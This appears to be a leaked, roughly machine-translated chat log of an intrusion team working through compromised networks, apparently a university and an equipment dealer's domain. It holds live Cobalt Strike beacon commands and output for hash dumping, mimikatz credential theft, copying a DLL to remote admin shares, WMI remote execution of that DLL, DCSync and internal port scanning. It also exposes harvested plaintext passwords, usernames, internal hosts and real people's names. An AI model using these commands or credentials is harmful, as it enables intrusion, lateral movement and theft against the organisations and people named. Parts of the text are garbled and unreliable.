Teams.exe x86 1 UNFCSD\N00865522 3324 12848 Teams.exe x86 1 UNFCSD\N00865522 6696 12848 Teams.exe x86 1 UNFCSD\N00865522 6844 12848 Teams.exe x86 1 UNFCSD\N00865522 16964 12848 Teams.exe x86 1 UNFCSD\N00865522 17508,12848 Teams.exe x86 1 UNFCSD\N00865522 24584 12848 Teams.exe x86 1 UNFCSD\N00865522 25340 12848 Teams.exe x86 1 UNFCSD\N00865522 33028 12848 Teams.exe x86 1 UNFCSD\N00865522 13132 8176 dllhost.exe 14396 14864 EEventManager.exe x86 1 UNFCSD\N00865522 14428 14412 ApntEx.exe x64 1 UNFCSD\N00865522 14444 14428 conhost.exe x64 1 UNFCSD\N00865522 14972 14864 iusb3mon.exe x86 1 UNFCSD\N00865522 15260 14864 hpwuschd2.exe x86 1 UNFCSD\N00865522 15280 14864 jusched.exe x86 1 UNFCSD\N00865522 17696 15280 jucheck.exe x86 1 UNFCSD\N00865522 15308 14864 Creative Cloud.exe x64 1 UNFCSD\N00865522 15416 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522 15492 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522 16120 15308 Adobe Desktop Service.exe x86 1 UNFCSD\N00865522 11900 16120 CoreSync.exe x86 1 UNFCSD\N00865522 16764 16120 Creative Cloud Helper.exe x64 1 UNFCSD\N00865522 17360 15308 AdobeIPCBroker.exe x86 1 UNFCSD\N00865522 25664 15308 CCLibrary.exe x64 1 UNFCSD\N00865522 27556 25664 node.exe x64 1 UNFCSD\N00865522 15848 27556 conhost.exe x64 1 UNFCSD\N00865522 27656 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522 28880 15308 Adobe CEF Helper.exe x64 1 UNFCSD\N00865522 22540 21392 Dropbox.exe x86 1 UNFCSD\N00865522 17332 22540 QtWebEngineProcess.exe x86 1 UNFCSD\N00865522 19912 22540 Dropbox.exe x86 1 UNFCSD\N00865522 21868 22540 QtWebEngineProcess.exe x86 1 UNFCSD\N00865522 21872 22540 Dropbox.exe x86 1 UNFCSD\N00865522 22832 1772 acrotray.exe x86 1 UNFCSD\N00865522 27932 51660 MicrosoftEdge_X64_87.0.664.52_87.0.664.47.exe 51156 27932 setup.exe 22624 51156 setup.exe ``COB-62001 ``` PID PPID Name Arch Session User --- ---- ---- ---- ------- ---- 0 0 [System Process] 4 0 System x64 0 56 4 Secure System x64 0 NT AUTHORITY\SYSTEM 112 4 Registry x64 0 NT 
AUTHORITY\SYSTEM 352 4 smss.exe x64 0 NT AUTHORITY\SYSTEM 1768 4 Memory Compression x64 0 NT AUTHORITY\SYSTEM 528 512 csrss.exe x64 0 NT AUTHORITY\SYSTEM 656 512 wininit.exe x64 0 NT AUTHORITY\SYSTEM 84 656 fontdrvhost.exe x64 0 Font Driver Host\UMFD-0 752 656 services.exe x64 0 NT AUTHORITY\SYSTEM 552 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 940 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM 980 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM 1292 980 WmiPrvSE.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1412 980 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE 5832 1412 rundll32.exe x64 0 UNFCSD\n01447311 4484 5832 cmd.exe x64 0 UNFCSD\n01447311 1072 4484 timeout.exe x64 0 UNFCSD\n01447311 4444 4484 conhost.exe x64 0 UNFCSD\n01447311 2720 980 WmiPrvSE.exe x64 0 NT AUTHORITY\n0144311 2724 980 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM 4844 980 WmiPrvSE.exe x64 0 NT AUTHORITY/\SYSTEM 1088 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM 1108 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 1184 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 1200 752 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE 1268 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1296 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1356 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 1452 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1500 752 atiesrxx.exe x64 0 NT AUTHORITY\SYSTEM 3292 1500 atieclxx.exe x64 1 NT AUTHORITY\SYSTEM 1548 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1556 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1564 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1572 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM 1592 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1600 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1608 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1616 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1624 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1632 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1648 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 1780 752 igfxCUIService.exe x64 0 NT 
AUTHORITY/LOCAL SERVICE 1832 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 1916 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 1956 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 1968 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2024 752 CcmExec.exe x64 0 NT AUTHORITY\SYSTEM 2128 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 2136 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2164 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 2208 752 svchost.exe x64 0 NT AUTHORITY/ LOCAL SERVICE 2212 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 2224 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2256 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 2380 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2492 752 svchost.exe x64 0 NT AUTHORITY/\LOCAL SERVICE 2508 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 2552 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 2560 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 2728 752 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE 2764 752 SgrmBroker.exe x64 0 NT AUTHORITY\LOCAL SERVICE 2788 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 2896 752 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM 2920 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 2984 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 3024 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 3028 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 3076 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 3156 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 3224 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM 3320 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 3332 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 3344 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 3372 752 MsMpEng.exe x64 0 NT AUTHORITY\SYSTEM 3412 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 3492 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 3504 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 3520 752 svchost.exe x64 0 NT AUTHORITY/\SYSTEM 3724 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 3904 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 3924 752 SearchIndexer.exe x64 0 
NT AUTHORITY\SYSTEM 4000 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 4068 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 4208 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 4336 752 securityHealthService.exe x64 0 NT AUTHORITY\SYSTEM 4400 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 4788 752 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE 4812 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 5212 752 svchost.exe x64 0 NT AUTHORITY\SYSTEM 5236 752 NisSrv.exe x64 0 NT AUTHORITY\LOCAL SERVICE 6044 752 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE 820 656 lsaIso.exe x64 0 NT AUTHORITY\SYSTEM 828 656 lsass.exe x64 0 NT AUTHORITY\SYSTEM 672 648 csrss.exe x64 1 NT AUTHORITY\SYSTEM 760 648 winlogon.exe x64 1 NT AUTHORITY\SYSTEM 76 760 fontdrvhost.exe x64 1 Font Driver Host\UMFD-1 1064 760 logonUI.exe x64 1 NT AUTHORITY\SYSTEM 1216 760 dwm.exe x64 1 Window Manager\DWM-1 ``get the full list of processes here,`` only on 2 windows 10 ``:thinking:but he has access to the admin ball or says that the current user is not LAELWAYS spawns sessions without *she will try to do something about it about the current machine is strangecore this user has admin only on 2 windas 10enterprice (empty), on 1 servak (current machine), the other 319 are Windows education, computers in the students, they have nothing to catch it and was going to do and tell me whether there is a server OS from the old list of hosts with admin balls turns out so that now we have that yesterday's polozak?i have no usernames and passwords at all and i started reshooting the ballsvirtually 20 minutes ago i restored it via Citrix as i came with it a session hung for 8 hours i wrote that polzak session or login / pass remained? no polzak one and the same? now i will download it again, yesterday you were from there selected hosts with admin balls? i mean the previous output list was not added more job just hung everything that has collected ``` [*] Parsed 7530 computer objects. 
Shares for CONDORCLUSTER: [--- Unreadable Shares ---] ClusterStorage$ IPC$
Shares for WILDCATNEW: [--- Unreadable Shares ---] IPC$
Shares for COB-62001: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for chem-62837: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ccdc Chalk Research Group's Public Folder Chalk, Stuart's Public Folder chembl COASAdmin's Public Folder donh's Public Folder ncct nistsdm trc
Shares for CEC-59126: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$ E$ F$ K$ print$
Shares for WILDCAT: [--- Unreadable Shares ---] IPC$
Shares for Coppicecluster: [--- Unreadable Shares ---] ClusterStorage$ IPC$
Shares for ThicketA: [--- Unreadable Shares ---] IPC$
Shares for primrose: [--- Unreadable Shares ---] IPC$
Shares for hedgea: [--- Unreadable Shares ---] IPC$
Shares for ThicketB: [--- Unreadable Shares ---] IPC$
Shares for BriarA: [--- Unreadable Shares ---] IPC$
Shares for ThicketC: [--- Unreadable Shares ---] IPC$
Shares for PHYS-65427: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65428: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65430: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-63941: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65439: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65440: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65435: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65438: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-63945: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65433: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65437: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-63943: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65432: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65442: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-63947: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHYS-65441: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$ print$
Shares for PHYS-65436: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for thicketd: [--- Unreadable Shares ---] IPC$
Shares for ThicketE: [--- Unreadable Shares ---] IPC$
Shares for CEC-66268: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$ Users
Shares for PHL-66859: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for CEC-63643: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$ print$
Shares for PHL-66860: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66886: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66897: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66872: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66891: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66868: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66865: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66866: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66882: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66885: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66884: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for PHL-66892: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66368: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66375: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66373: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66382: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66400: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66377: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66381: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66394: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66385: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66396: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66397: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66384: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66392: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66401: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66386: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66399: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for ITST-66393: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] ADMIN$ C$
Shares for mus-63011: [--- Unreadable Shares ---] IPC$ [--- Listable Shares ---] Administrator's Public Folder Biernacki, Krzysztof's Public Folder Daugherty, John's Public Folder Hines, Clarence's Public Folder Pavlesich, Adina's Public Folder Studio Lessons's Public Folder n00865522
```

Give me the whole list of PCs with admin shares under the current user
completion on another machine, in another it gives output, but this again only in this session

```
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
[-] no results.
```

hashdump comes out with a minus, but the computer itself seems to be neutered one way or another, i.e. there is output, etc.

```
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 438866 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Key import
```

```
beacon> jobs
[*] Tasked beacon to list jobs
[+] host called home, sent: 8 bytes
[*] Jobs

 JID  PID    Description
 ---  ---    -----------
 17   12304  process
```

```
beacon> shell copy x64.dll \\139.62.66.77\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\139.62.66.77\C$\ProgramData
[+] host called home, sent: 73 bytes
```

```
beacon> shell dir
[*] Tasked beacon to run: dir
[+] host called home, sent: 34 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is CA3E-DD31

 Directory of C:\ProgramData

12/02/2020  04:31 AM             %LOCALAPPDATA%
12/01/2020  04:27 PM         272 2013.par
04/07/2018  11:09 AM      35,888 3002.abs
05/02/2015  07:50 PM      15,568 3029.abs
11/11/2019  05:42 PM             ABBYY
10/12/2020  01:43 PM             Adobe
11/20/2020  09:32 AM
```

Certainly, in the session from which I could not push the DLL to other computers, mimikatz worked with an error, google pinged, and the shares through the shell-type output are there in this output, but not from all the previous ones; after AdFind it first did not work, then broke, as if the response took 10 minutes, although the heartbeat was about 3-5 seconds
were you in both Cobalts? beacon output does not fly from the network?
but I'm talking specifically about the current network; the scanners are not sleeping in the new one, which is wikibros.com, today a lot of bogus sessions came in
the previous one, which is likenic.com, went in yesterday and there were a bunch of sessions with 500-800 hours of sleep
I gave you the additional Cobalt; does such an anomaly arrive in both Cobalts for you?
by the way Cobalt in BL got 90%)
did not come to me
understood
I made a case in an existing session: there is a host calls home, but no output in beacon?
in short, from that session, the call to the other computers didn't work
there is no output, not working and I can't copy it, I can't copy from that session, I just went back to Citrix and saved myself yesterday's starting session, I'm re-enumerating the shares just in case there will be more, and I can spam, waiting until one has 10 unterricks, mainly Windows 10 Education as yesterday
I have access to Windows 10 Education, did steal_token, injected into the user's process, the session either does not appear, or appears stillborn
@tl1 so you fix it, since there are system sessions
In general, the session where there was a user, I jumped out of it, the system one remains, there is another user, now I will jump into his process and will watch the shares again
then dcsync here
DCSync taken; looking for cloud administration of Webroot SecureAnywhere
in the SPNs there is `servicePrincipalName: exchangeAB/JDODC67.jdossn.local` - it pings. What to do with it?
in ad_users there is something like `smtp:NHNorRAremb@jdisonline.com` but `jdisonline.com` does not resolve
google, hotmail, yahoo, etc.: in browsers they have public services
also, if you pulled the browsers, where do they have mail? or in SPNs can exchangemailEX be written too? =)
no one with a name that has `exc`
I'll check
and do you see the Exchange server? it's a pinged list of servers
and how to find it? from where I am, most of them don't seem to be visible at all
did you scan the ranges?
the web server that holds the Citrix authorization is VERY often not in the domain
I check this list via dirb
```
[+] 172.31.45.14:    - 172.31.45.14:80     - TCP OPEN
[+] 10.99.202.247:   - 10.99.202.247:80    - TCP OPEN
[+] 10.99.205.75:    - 10.99.205.75:80     - TCP OPEN
[+] 10.99.195.11:    - 10.99.195.11:443    - TCP OPEN
[+] 10.99.202.247:   - 10.99.202.247:443   - TCP OPEN
[+] 172.31.190.157:  - 172.31.190.157:443  - TCP OPEN
[+] 10.99.198.60:    - 10.99.198.60:443    - TCP OPEN
[+] 10.99.193.18:    - 10.99.193.18:443    - TCP OPEN
[+] 10.99.198.60:    - 10.99.198.60:80     - TCP OPEN
[+] 172.31.45.15:    - 172.31.45.15:80     - TCP OPEN
[+] 10.99.205.75:    - 10.99.205.75:443    - TCP OPEN
[+] 10.99.202.181:   - 10.99.202.181:443   - TCP OPEN
[+] 10.99.201.43:    - 10.99.201.43:443    - TCP OPEN
[+] 10.99.193.24:    - 10.99.193.24:443    - TCP OPEN
[+] 10.99.193.24:    - 10.99.193.24:80     - TCP OPEN
[+] 10.99.201.43:    - 10.99.201.43:80     - TCP OPEN
[+] 172.31.45.20:    - 172.31.45.20:80     - TCP OPEN
[+] 10.99.193.18:    - 10.99.193.18:80     - TCP OPEN
```

it's not necessary that you just have a direct redirect from the host on the port; over SOCKS you can brute-force it properly, look, there are such utilities: dirb / dirbuster
Then yes. I understand it is a local hostname or address; I did not specify an external domain, it is on the local one; I suggest checking
no, in amazon there is 2FA. I check on the local one
I do not think it is worth climbing into amazon at all
as I understood, they used to have their own Citrix - after it a certain number of servers were left. Now they're in the cloud on amazon. And it looks like it's not their Citrix, but John Deere's, and it has LDAP authorization bolted on to it. I'm looking on their local servers now - maybe there's something left...
take all the hosts that are open on port 80/443. Run dirbuster in the format https://hostname/vpn/index.html or https://ipaddr/vpn/index.html
`https://*domain.com/vpn/index.html` - here's the default path to the Citrix login.
I'm a little confused maybe... but why Citrix
preselect all live servers with a hint of Citrix in the name or description
what I'm trying here: I found that it is not /login but /cgi/login
yes.
and http and https? https added? comp name is not necessarily = server name; login also comes here by itself, https://....../login, so go by the name, the name might show something ... 80 is the same, and check ports 80 and 443; it can be specified by name or by IP, it is a separate configuration block, access by IP; for example nginx, if configured, answers by name, but by IP gives a 404
the scheme http(s) why? well, within the domain a web server may just not give anything when accessed by IP
systeminfo, ipconfig
local - what?
and then how to get all the local DNS? what is available and local.
here's another question - there are Citrix Delivery Controllers, there is Citrix Director, probably something else too. what should I look for?
as an option, write the domain in hosts to the local IP of Citrix
will try now
well yes, just logging in by IP - the auto redirect will not work
443 80
the same web admin port) port what citrix? 80???

```
beacon> portscan 3.15.36.195 80,443 icmp 2
[*] Tasked beacon to scan ports 80,443 on 3.15.36.195
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
```

Yeah, LDAP is probably connected but I don't think it's part of the domain
then 80 and 443

```
beacon> shell ping signon.jdisonline.com
[*] Tasked beacon to run: ping signon.jdisonline.com
[+] host called home, sent: 57 bytes
[+] received output:

Pinging ok11-crtr-custom-domains-cd76c2bd4d92725a.elb.us-east-2.amazonaws.com [3.15.36.195] with 32 bytes of data:
Request timed out.
Request timed out.
[+] received output:
Request timed out.
[+] received output:
Request timed out.

Ping statistics for 3.15.36.195:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
```

```
beacon> portscan 3.15.36.195 445,139 icmp 2
[*] Tasked beacon to scan ports 445,139 on 3.15.36.195
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
```

Can you see ports 445, 139? 445?
ping what? if Citrix, amazon. but the samaccountname from the local domain is set at ping?
their servers may be on amazon in some strange place. but it seems they have different settings. two of them ask for 2FA at login and one at change of settings; here also 2FA.

```
--- Chromium Credential (User: ndmicjsater) ---
URL      : https://jdoapps.jdisonline.com/cgi/login
Username : ndmicjsater
Password : NDleading22
```

Is it okay if it's their server or not? It looks like they moved the Citrix servers to amazon. is that okay?
ok. I'm already looking for a session on a server where you can get at least a hash.
there is a place to find the creds, I think you can find the creds
ok, but JDODMP03.jdossn.local resolves to this IP.
>memberOf: CN=NDLEADING_Citrix_Local_Drives,
Then pull the browsers where you can and look for Citrix
strange
here also the usual users, nothing more. and the AD_comp `34648 Objects returned`
external?

```
UserName        : jdodmp_svc
ComputerName    : JDODC67.jdossn.local
SessionFrom     : 204.54.154.136
SessionFromName : JDODMP03.jdossn.local
LocalAdmin      : False
```

they are not in this subnet and can't be seen from here (so go to the DA's PC and take their hash off) practically.
on the DA's it does not let in at all? and not the servers, does not let in. on the user PCs the same LA, so you only go to the user PCs?
I don't remember, I think I checked. I don't remember. I think I checked it again.
```
>uSNCreated: 63484
>memberOf: CN=NDLEADING_DPARTS,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_PARTS,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_ALL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_All_Email,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING SharePoint Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Citrix_Local_Drives,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_SDK_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Technicians,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Schedulers,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Managers,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_SD_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_Reports_Drive,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING SharePoint,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIP_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIPRDB-ALL,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_EQUIPPatch_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Excel_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Dealer_Portal_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Computer_Account_Admins,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_All_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
>memberOf: CN=NDLEADING_Password_Reset_Users,OU=Groups,OU=NDLEADING,OU=Customers,DC=jdossn,DC=local
```

Where did you find the webroot access? not DA?
they administer under LA only; in kerberos nowhere DA?
yeah, dunno. now 10 active. I think I went through all the available PCs on the available?
and yes, I can not go out of the local network and I can not take the DA?
and have you already found the admin? ah, no)))
I also have webroot installed
have you already found the admin in the second network?
and have you not mixed up the group? no.
neighbor xox threw it from the user's machine
where did you take the access from?

```
--- Chromium Credential (User: ndmicjsater) ---
URL      : https://my.webrootanywhere.com/default.aspx
Username : jasons@leadingedgeequip.com
Password : jsateren8726
```

but it still asks for a 2FA confirmation code
try through RDP
oping. went through smb_login - among those where the creds came up, there are 2 servers with open RDP.
pinging the list of servers for the following smb login

```
beacon> shell wmic /NODE:172.31.190.103 /privileges:enable OS GET Name,OSArchitecture
[*] Tasked beacon to run: wmic /NODE:172.31.190.103 /privileges:enable OS GET Name,OSArchitecture
[+] host called home, sent: 104 bytes
[+] received output:
Node - 172.31.190.103
ERROR:
Description = The RPC server is unavailable.
```

`remote-exec wmi 172.31.190.103 rundll32 \\172.31.190.103\testvolume\GH-GHNS-DHS_Copy\office365\mui.dll entryPoint`
remote-exec all three methods
run how?
Well, the NAS is not Windows most likely ))
no, maybe you can put it in the group, yes?
about failed to start the DLL, i.e.? do not change the passwords, the other one is just a user. on the NAS starting the DLL did not work. He has rights to change passwords, as I understand it. Is there any way to use this?
and there are no other accesses?

```
Username : nddevbernst
Password : NDleading2021!
```
only to custom ones.
some to the aggressor whale
could you send me a link to a netlogon that worked
and the admin above is nowhere to be found?
I need to duplicate it in the conf
let me duplicate it again, I lost the 445 port results file
what kind of PC?
all subnets from the AdFind scanned on /24, only 3-4 computers in play
did you look for VG and external backups?
in SPNs there is the hyper-v replica service on several machines, this is the maximum I saw
0 trusts, 37 servers, 1205 workstations
I think if you pinged, it would be much less than that
and how many servers, workstations and trusts do we have? there iscsi is empty, there's ehs, no creds, there are two servers bgukhoveam, there's a tiny bit of .bco-shares, bally44backup, there's a lot of backups, nothing else found a la vSphere, hypervisors, etc
any signs of cloud solutions?
let's complicate the process today, let's check the WOL. then write to the group the number of PCs, workstations and trusts
chromium admins, chromium all users, ran through all computers where admins sat yesterday, then today we close; admins surely had no hints of cloud or VG on backups? yes
there all found, what do I need? found one more guy, his credentials do not bring up a session on three computers. I remove the credentials from them via CME
the same thing
There are a couple of subnets left to scan. so far nothing in bellimore, still in search of the creds from the echyotr
write down, what are your results? in preparation for closing in balimor
fine, clarified. if you are done with the lab go to the networks
3 days ago I tried to build a server, at what time I don't remember. fuck.... I'm already confused on all sides. or am I misunderstanding?
just not setting up and building the server
so you were still busy with the lab 3 days ago?
for the lab, should have been, but nothing started on it. I put it aside, it's at my desk. Then I brought a different one to the office, it started up and now it's spinning. Do you want me to describe the hardware?
I already saw it, it's just 16 minutes on the 22nd, counted as three days
pieced together = assembled? What kind of server?
100% Yesterday and today I did the lab, I can't tell you. Before that I was piecing together a server on a Chinese motherboard that does not fuckin' work! that was three days ago.
